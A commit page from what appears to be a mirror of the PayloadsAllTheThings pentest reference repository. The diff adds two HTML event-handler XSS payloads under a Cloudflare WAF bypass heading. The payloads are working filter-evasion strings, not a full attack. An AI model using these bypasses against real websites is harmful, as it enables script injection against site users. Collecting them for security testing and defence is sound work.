mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-31 07:27:25 +00:00
Adding Cloudflare XSS payload
This commit is contained in:
parent
3f2f156c12
commit
2b6c3cb360
@ -1048,6 +1048,13 @@ Works for CSP like `script-src 'self' data:`
|
|||||||
|
|
||||||
### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
|
### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
|
||||||
|
|
||||||
|
#### 25st January 2021
|
||||||
|
|
||||||
|
```html
|
||||||
|
<svg/onrandom=random onload=confirm(1)>
|
||||||
|
<video onnull=null onmouseover=confirm(1)>
|
||||||
|
```
|
||||||
|
|
||||||
#### 21st April 2020
|
#### 21st April 2020
|
||||||
|
|
||||||
```html
|
```html
|
||||||
|
Loading…
Reference in New Issue
Block a user